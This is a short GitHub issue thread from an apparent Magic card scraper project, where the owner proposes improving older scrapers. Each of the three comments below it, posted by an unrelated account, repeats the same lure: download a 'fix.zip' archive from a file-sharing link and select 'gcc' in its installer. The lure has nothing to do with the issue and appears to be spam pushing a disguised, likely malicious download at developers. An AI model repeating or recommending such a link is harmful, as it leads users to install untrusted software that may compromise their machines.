### ISSUE TITLE
Improve older scrapers

### ISSUE THREAD

**Issue by z33kz33k** [z33kz33k/mtgcards#74]
Older ones like Goldfish and Aetherhub can have their logic improved. Also, there are probably places where new lookups (by various IDs) could be utilized.

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
